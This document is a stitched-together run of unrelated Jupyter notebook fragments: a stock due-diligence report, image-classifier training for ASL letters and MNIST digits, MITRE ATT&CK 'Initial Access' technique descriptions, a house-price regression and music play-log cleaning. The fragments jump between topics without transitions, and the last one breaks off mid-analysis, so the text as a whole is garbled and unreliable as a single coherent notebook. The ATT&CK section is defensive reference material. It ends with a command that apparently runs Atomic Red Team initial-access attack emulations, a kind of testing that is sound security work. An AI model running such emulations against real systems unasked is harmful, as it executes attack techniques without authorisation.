Notebook setupimport io import warnings from datetime import datetime, timedelta import matplotlib.pyplot as plt import matplotlib_inline.backend_inline from openbb_terminal import api as openbb from openbb_terminal.helper_classes import TerminalStyle %matplotlib inline matplotlib_inline.backend_inline.set_matplotlib_formats("svg") warnings.filterwarnings("ignore") try: theme = TerminalStyle("light", "light", "light") except: pass stylesheet = openbb.widgets.html_report_stylesheet()Select Ticker# Parameters that will be replaced when calling this notebook ticker = "AMC" report_name = "" ticker_data = openbb.stocks.load(ticker, start=datetime.now() - timedelta(days=365)) ticker_data = openbb.stocks.process_candle(ticker_data) report_title = f"{ticker.upper()} Due Diligence report ({datetime.now().strftime('%Y-%m-%d %H:%M:%S')})" report_title overview = openbb.stocks.fa.models.yahoo_finance.get_info(ticker=ticker).transpose()[ "Long business summary" ][0] overviewData( df_year_estimates, df_quarter_earnings, df_quarter_revenues, ) = openbb.stocks.dd.models.business_insider.get_estimates(ticker)1. Yearly Estimatesdisplay_year = sorted(df_year_estimates.columns.tolist())[:3] df_year_estimates = df_year_estimates[display_year].head(5) df_year_estimates2. Quarterly Earningsdf_quarter_earnings3. Quarterly Revenuesdf_quarter_revenues4. SEC Filingsdf_sec_filings = openbb.stocks.dd.models.marketwatch.get_sec_filings(ticker)[ ["Type", "Category", "Link"] ].head(5) df_sec_filings5. Analyst Ratingsdf_analyst = openbb.stocks.dd.models.finviz.get_analyst_data(ticker) df_analyst["target_to"] = df_analyst["target_to"].combine_first(df_analyst["target"]) df_analyst = df_analyst[["category", "analyst", "rating", "target_to"]].rename( columns={ "category": "Category", "analyst": "Analyst", "rating": "Rating", "target_to": "Price Target", } ) df_analystPlots 1. 
Price historyfig, (candles, volume) = plt.subplots(nrows=2, ncols=1, figsize=(5, 3), dpi=150) openbb.stocks.candle( s_ticker=ticker, df_stock=ticker_data, use_matplotlib=True, external_axes=[candles, volume], ) candles.set_xticklabels("") fig.tight_layout() f = io.BytesIO() fig.savefig(f, format="svg") price_chart = f.getvalue().decode("utf-8")2. Price Targetfig, ax = plt.subplots(figsize=(8, 3), dpi=150) openbb.stocks.dd.pt( ticker=ticker, start="2021-10-25", interval="1440min", stock=ticker_data, num=10, raw=False, external_axes=[ax], ) fig.tight_layout() f = io.BytesIO() fig.savefig(f, format="svg") price_target_chart = f.getvalue().decode("utf-8")3. Ratings over timefig, ax = plt.subplots(figsize=(8, 3), dpi=150) openbb.stocks.dd.rot( ticker=ticker, num=10, raw=False, export="", external_axes=[ax], ) fig.tight_layout() f = io.BytesIO() fig.savefig(f, format="svg") ratings_over_time_chart = f.getvalue().decode("utf-8")Render the report template to a filebody = "" # Title body += openbb.widgets.h(1, report_title) body += openbb.widgets.h(2, "Overview") body += openbb.widgets.row([openbb.widgets.p(overview)]) # Analysts ratings body += openbb.widgets.h(2, "Analyst assessments") body += openbb.widgets.row([price_target_chart]) body += openbb.widgets.row([df_analyst.to_html()]) body += openbb.widgets.row([ratings_over_time_chart]) # Price history and yearly estimates body += openbb.widgets.row( [ openbb.widgets.h(3, "Price history") + price_chart, openbb.widgets.h(3, "Estimates") + df_year_estimates.head().to_html(), ] ) # Earnings and revenues body += openbb.widgets.h(2, "Earnings and revenues") body += openbb.widgets.row([df_quarter_earnings.head().to_html()]) body += openbb.widgets.row([df_quarter_revenues.head().to_html()]) # Sec filings and insider trading body += openbb.widgets.h(2, "SEC filings") body += openbb.widgets.row([df_sec_filings.to_html()]) report = openbb.widgets.html_report(title=report_name, stylesheet=stylesheet, body=body) # to save the results with open(report_name + ".html", "w") as fh: fh.write(report)Data / Preprocessingtrain_valid_path = '../../data/asl_alphabet_train' test_path = '../../data/asl_alphabet_validation' pp_func = keras.applications.vgg16.preprocess_input datagen = ImageDataGenerator( preprocessing_function=pp_func, rescale=1./255, validation_split=0.2) testgen = ImageDataGenerator( preprocessing_function=pp_func, rescale=1./255) classes = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ') classes.append('del') classes.append('space') classes.append('nothing') image_size = 128 batch_size = 10 print('done') train_batches = datagen.flow_from_directory( train_valid_path, #directory for training images target_size=(image_size, image_size), batch_size=batch_size, class_mode='categorical', classes=classes, # color_mode='grayscale', shuffle=True, subset='training') print('done') val_batches = datagen.flow_from_directory( train_valid_path, # same directory for testing images target_size=(image_size, image_size), batch_size=batch_size, class_mode='categorical', classes=classes, # color_mode='grayscale', shuffle=True, subset='validation') print('done') test_batches = testgen.flow_from_directory( test_path, # directory for validation images target_size=(image_size, image_size), batch_size=batch_size, class_mode='categorical', classes=classes, # color_mode='grayscale', shuffle=False) print('done') assert train_batches.n == 69601 assert val_batches.n == 17400 assert test_batches.n == 30 assert train_batches.num_classes == val_batches.num_classes == test_batches.num_classes == 29 
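As a quick sanity check on the generators above, the one-hot label rows can be decoded back to letter names by inverting the generator's `class_indices` mapping. This is only a minimal sketch, assuming the `train_batches` generator defined in the previous cell; the `index_to_class` and `batch_*` names are introduced here purely for illustration.

```python
import numpy as np

# Invert the class -> index mapping built by flow_from_directory so that
# one-hot label rows can be decoded back to class names.
# Assumes the train_batches generator from the cell above.
index_to_class = {v: k for k, v in train_batches.class_indices.items()}

batch_imgs, batch_labels = next(train_batches)   # batch_labels: (batch_size, 29)
decoded = [index_to_class[int(np.argmax(row))] for row in batch_labels]
print(decoded)   # e.g. ['A', 'space', 'Q', ...] for one batch of 10 images
```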
imgs, labels = next(train_batches) def plotImages(imgs_arr): fig, axs = plt.subplots(1, 10, figsize=(20,20)) axs = axs.flatten() for img, ax in zip(imgs_arr, axs): ax.imshow(img) ax.axis('off') plt.tight_layout() plt.show() plotImages(imgs) print(labels)Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers). [...]Build & Train CNNmodel = Sequential([ Conv2D(filters=32, kernel_size=(3,3), activation='relu', padding='same', input_shape=(image_size,image_size,3)), MaxPool2D(pool_size=(2,2), strides=2), Conv2D(filters=64, kernel_size=(3,3), activation='relu', padding='same'), MaxPool2D(pool_size=(2,2), strides=2), Flatten(), Dense(units=29, activation='softmax') ]) model.summary() model.compile(optimizer=Adam(learning_rate=0.0001), loss='categorical_crossentropy', metrics=['accuracy']) model.fit(x=train_batches, validation_data=val_batches, epochs=10, verbose=2)Epoch 1/10Training NotebookThis notebook illustrates training of a simple model to classify digits using the MNIST dataset. This code is used to train the model included with the templates. This is meant to be a starter model to show you how to set up Serverless applications to do inference. For a deeper understanding of how to train a good model for MNIST, we recommend literature from the [MNIST website](http://yann.lecun.com/exdb/mnist/). The dataset is made available under a [Creative Commons Attribution-Share Alike 3.0](https://creativecommons.org/licenses/by-sa/3.0/) license.# We'll use scikit-learn to load the dataset ! pip install -q scikit-learn==0.23.2 # Load the mnist dataset from sklearn.datasets import fetch_openml from sklearn.model_selection import train_test_split X, y = fetch_openml('mnist_784', return_X_y=True) # We limit training to 10000 images for faster training. Remove train_size to use all examples. 
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=1000, train_size=10000) # Next, let's add code for deskewing images (we will use this to improve accuracy) # This code comes from https://fsix.github.io/mnist/Deskewing.html from scipy.ndimage import interpolation import numpy as np def moments(image): c0, c1 = np.mgrid[:image.shape[0], :image.shape[1]] img_sum = np.sum(image) m0 = np.sum(c0 * image) / img_sum m1 = np.sum(c1 * image) / img_sum m00 = np.sum((c0-m0)**2 * image) / img_sum m11 = np.sum((c1-m1)**2 * image) / img_sum m01 = np.sum((c0-m0) * (c1-m1) * image) / img_sum mu_vector = np.array([m0,m1]) covariance_matrix = np.array([[m00, m01],[m01, m11]]) return mu_vector, covariance_matrix def deskew(image): c, v = moments(image) alpha = v[0,1] / v[0,0] affine = np.array([[1,0], [alpha,1]]) ocenter = np.array(image.shape) / 2.0 offset = c - np.dot(affine, ocenter) return interpolation.affine_transform(image, affine, offset=offset) def deskew_images(images): output_images = [] for image in images: output_images.append(deskew(image.reshape(28, 28)).flatten()) return np.array(output_images)Scikit-learn Model TrainingFor this example, we will train a simple SVM classifier using scikit-learn to classify the MNIST digits. We will then freeze the model in the `.joblib` format. This is the same as the starter model file included with the SAM templates.%%time import sklearn import numpy as np from sklearn.metrics import accuracy_score from sklearn import svm print (f'Using scikit-learn version: {sklearn.__version__}') # Fit our training data clf = svm.SVC(degree=5) clf.fit(X_train, y_train) # Evaluate the fitted model's accuracy on the test set accuracy = accuracy_score(y_test, clf.predict(X_test)) print('Test accuracy without deskewing:', accuracy) %%time # Let's try this again with deskewing on # Fit our training data clf = svm.SVC(degree=5) clf.fit(deskew_images(X_train), y_train) # Evaluate the fitted model's accuracy on the test set accuracy = accuracy_score(y_test, clf.predict(deskew_images(X_test))) print('Test accuracy with deskewing:', accuracy) import joblib # Save the model to disk with compression to keep size low joblib.dump(clf, 'digit_classifier.joblib', compress=3)Initial AccessThe adversary is trying to get into your network.Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords. Techniques| ID | Name | Description || :--------: | :---------: | :---------: |T1078.004 | Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management systems, such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. 
Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.T1078.003 | Local Accounts | Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. T1078.002 | Domain Accounts | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.T1078.001 | Default Accounts | Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019)Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)T1195.003 | Compromise Hardware Supply Chain | Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. 
Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.T1195.002 | Compromise Software Supply Chain | Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) T1195.001 | Compromise Software Dependencies and Development Tools | Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. T1566.003 | Spearphishing via Service | Adversaries may send spearphishing messages via third-party services in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.T1566.002 | Spearphishing Link | Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. 
It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)T1566.001 | Spearphishing Attachment | Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.T1566 | Phishing | Adversaries may send phishing messages to elicit sensitive information and/or gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.Adversaries may send victim’s emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). 
Phishing may also be conducted via third-party services, like social media platforms.T1189 | Drive-by Compromise | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).Multiple ways of delivering exploit code to a browser exist, including:* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.* Malicious ads are paid for and served through legitimate ad providers.* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)Typical drive-by compromise process:1. A user visits a website that is used to host the adversary controlled content.2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.3. Upon finding a vulnerable version, exploit code is delivered to the browser.4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)T1190 | Exploit Public-Facing Application | Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. 
These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)T1200 | Hardware Additions | Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.T1195 | Supply Chain Compromise | Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.Supply chain compromise can take place at any stage of the supply chain including:* Manipulation of development tools* Manipulation of a development environment* Manipulation of source code repositories (public or private)* Manipulation of source code in open-source dependencies* Manipulation of software update/distribution mechanisms* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions* Sales of modified/counterfeit products to legitimate distributors* Shipment interdictionWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)T1199 | Trusted Relationship | Adversaries may breach or otherwise leverage organizations who have access to intended victims. 
Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.T1133 | External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally.Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.T1091 | Replication Through Removable Media | Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. 
Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)#Invoke-AtomicTest-By can be downloaded from https://github.com/cyb3rbuff/ART-Utils/Invoke-AtomicTest-By Invoke-AtomicTest-By -Tactic initial-accessLoad numerical dataGenerated in notebook ``data_exploration_numerical_features.ipynb``dfnum_t2 = pd.read_csv('transformed_dataset_dfnum_t2.csv', index_col=['Dataset','Id']) dfnum_t2.head() dfnum_t2.tail()Recreate transformed (standardized) sale pricetarget = pd.read_csv('../data/train_target.csv') scaler = sk.preprocessing.StandardScaler() def standardize(df): _values = sk.preprocessing.StandardScaler().fit_transform(df) return pd.DataFrame(data=_values, columns=df.columns) def transform_target(target): logtarget = np.log1p(target / 1000) return scaler.fit_transform(logtarget) def inverse_transform_target(target_t): logtarget = scaler.inverse_transform(target_t) return np.expm1(logtarget) * 1000 target_t = transform_target(target) # Test assert all(target == inverse_transform_target(target_t))Ordinary Least Squares model with key featuresWe're left with 22 features. The first 4 should all be highly correlated with the price.data = dfnum_t2.loc['train',:].copy() data['SalePrice'] = target_t fig, axes = plt.subplots(2,2,figsize=(10,10)) for feature, ax in zip(key_features[:4], itertools.chain.from_iterable(axes)): ax.plot(data[feature], data['SalePrice'], 'o') ax.set(xlabel=feature, ylabel='SalePrice')Let's build a simple linear regression model based on these 4 features.regression1 = smapi.ols("SalePrice ~ OverallQual + GrLivArea + GarageCars + GarageArea", data=data).fit() regression1.summary()** R-squared equals 0.79 so it's pretty good for a first try. 
Let's see what happens if we include all our numerical features.**data.columnsStatsmodels gets confused with columns that start with a digit, so let's rename that column firstdata['1stFlrSF'].name = 'FlrSF' def rename_columns(df): return df.rename_axis({'1stFlrSF': 'FirstFlrSF', '2ndFlrSF': 'SndFlrSF'}, axis=1) data = rename_columns(data) data.columns desc = 'SalePrice ~ ' + ' + '.join(data.drop('SalePrice', axis=1)) descAs can be seen below, using more numerical values improves R-squared to 0.88 which is pretty good, though there's of course a risk of overfitting.regression2 = smapi.ols(desc, data=data).fit() regression2.summary()Cross validationdef get_data(X, y): df = X.copy() df['SalePrice'] = y return df def ols1(X, y): data = get_data(X, y) return smapi.ols("SalePrice ~ OverallQual + GrLivArea + GarageCars + GarageArea", data=data) def ols2(X, y): data = get_data(X, y) return smapi.ols(desc, data=data)Test the model Use `sklearn.model_selection.train_test_split` to run some experiments and validate the modelsdef rmse(prediction, exact): return np.mean((prediction - exact)**2.0)**0.5 def run_experiment(estimator, scoring=rmse): Xtrain, Xtest, ytrain, ytest = sk.model_selection.train_test_split(data.drop('SalePrice', axis=1), data['SalePrice']) model = estimator(Xtrain, ytrain).fit() return scoring(model.predict(Xtest), ytest) def cross_validate(estimator, cv=5): return np.array([run_experiment(estimator) for _ in range(cv)]) for model in [ols1, ols2]: errors = cross_validate(model) print(errors, errors.mean())Use `sklearn.model_selection_cross_val_score` to validate the modelsfor model in [ols1, ols2]: mse = np.sqrt(-sk.model_selection.cross_val_score(samlib.Regressor(model), data.drop('SalePrice', axis=1), y=data['SalePrice'], scoring='neg_mean_squared_error', cv=5)) print(mse, mse.mean())Make a submissiondfnum_t2 = rename_columns(dfnum_t2) submission_t = regression2.predict(dfnum_t2.loc['test',:])Scale the resultsubmission = inverse_transform_target(submission_t) submission def save(filename, submission): df = pd.DataFrame(data={ "Id": np.arange(len(submission)) + 1461, "SalePrice": submission }) df.to_csv(filename, index=False) save('ols_key_numerical_features_only.csv', submission)Data Cleansing and Wrangling -- and some insight for feature EDA and feature engineeringimport numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline df_play_log = pd.read_csv('C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\sampledata.csv',\ \ dtype = {'uid':'int', 'song_id':'str','date':'str'}) df_play_log.head() #dtype = {'uid':'int', 'song_id':'str','paid_flag':'str','date':'str'} df_play_log.isnull().sum(axis = 0)I. 
take care of missing values firstThe important columns for analysis are: date, play_time, and song_id, so drop the rows with missing values in these three fields.df_play_log = df_play_log.loc[df_play_log.file_name.notnull() & \ df_play_log.play_time.notnull() & \ df_play_log.song_id.notnull()] df_play_log.isnull().sum(axis = 0)Now assign int 0 to the missing values of song_type, which is the most common song_type.df_play_log.loc[df_play_log.song_type.isnull(),'song_type'] = 0 df_play_log.isnull().sum(axis = 0) df_play_log.shape df_play_log = df_play_log.loc[df_play_log.song_name.notnull() | (df_play_log.song_length > 1)] df_play_log.isnull().sum(axis = 0) df_play_log.loc[df_play_log.song_name.isnull(),'song_name'] = \ df_play_log.loc[df_play_log.song_name.isnull(),'singer'] df_play_log.loc[df_play_log.song_name.isnull()] df_play_log = df_play_log.loc[df_play_log.song_name.notnull()] df_play_log.isnull().sum(axis = 0) df_play_log = df_play_log.reset_index() df_play_log.head(10)II. Column-by-column Data Wrangling 1. Datedf_play_log.groupby('date').size()There is an outlier date '0 ' in the data, which should be dropped. Also, the date strings all start with a space ' ', which should be removed.df_play_log = df_play_log.loc[df_play_log.date != '0 '] df_play_log.shape df_play_log.date[0] df_play_log.date[0].split()[0] df_play_log.date = df_play_log.date.apply(lambda x: x.split()[0]) df_play_log.groupby(['date','label']).size()2. Song typedf_play_log.song_type.unique() str(3.0).split('.')[0] df_play_log.song_type = df_play_log.song_type.apply(lambda x: str(x).split('.')[0]) df_play_log.groupby(['song_type','label']).size()3. uid uid == 0 is an anomalous user: many of its play_time values are even larger than the song_length, so drop uid == 0.df_play_log.song_length = pd.to_numeric(df_play_log.song_length) df_play_log[(df_play_log.song_length <1) & (df_play_log.uid == 0)] df_play_log = df_play_log[df_play_log.uid != 0] df_play_log.shape4. play_time play_time values are strings, and some contain '>'. Split on '>' and keep only the part before it. Finally, convert the type to float.df_play_log['play_time'] = df_play_log['play_time'].apply(lambda x: x.split('>')[0]) df_play_log.play_time.value_counts() df_play_log.play_time = df_play_log.play_time.astype(float) df_play_log.loc[df_play_log.play_time == 0]Logs with play_time == 0 are too numerous to drop, so keep those rows. 5. song_id song_id should be an integer or a string of digits without a decimal part. The corner case is song_id == '0'. There are more than 500k logs that share '0' as song_id, but they are actually different songs: some songs have '0' plus another song_id, while some songs only have '0' as song_id. song_id imputation: 1) change the song_id to its most common value if the song has a value other than '0'; 2) if it doesn't have another song_id, create a new song_id. What is needed is a {(song_name, singer, song_type): song_id} dictionary.df_play_log.song_id = df_play_log.song_id.apply(lambda x: x.split('.')[0]) df_play_log.loc[df_play_log.song_id == '0'] df_play_log.groupby(['song_name','singer','song_type']).size().shape, \ df_play_log.groupby(['song_name','singer','song_type','song_id']).size().shapeAlthough the combination of ('song_name','singer','song_type') can identify a song without ambiguity, there ISN'T a one-to-one mapping from ('song_name','singer','song_type') to 'song_id'. 
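Before the group-by-group loop that follows, here is a more compact pandas sketch of the {(song_name, singer, song_type): song_id} dictionary described above. It assumes the cleaned `df_play_log` from the preceding cells; the helper `pick_song_id`, the `imputed_id` column, and the `'g'`-prefixed generated ids are illustrative stand-ins rather than the notebook's exact scheme.

```python
def pick_song_id(ids):
    # Prefer the most common real id; keep the placeholder '0' for now when
    # the group never appears with a real id.
    real = ids[ids != '0']
    return real.mode().iloc[0] if len(real) else '0'

song_id_map = (df_play_log
               .groupby(['song_name', 'singer', 'song_type'])['song_id']
               .agg(pick_song_id))

# Mint new ids (prefixed with 'g', mirroring the loop below) for groups that
# only ever carry the placeholder '0'.
placeholder = song_id_map == '0'
song_id_map.loc[placeholder] = ['g' + str(i) for i in range(placeholder.sum())]

# Apply the mapping back to the play log with a left merge on the key columns.
imputed = df_play_log.merge(
    song_id_map.rename('imputed_id').reset_index(),
    on=['song_name', 'singer', 'song_type'], how='left')
df_play_log['song_id'] = imputed['imputed_id'].values
```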
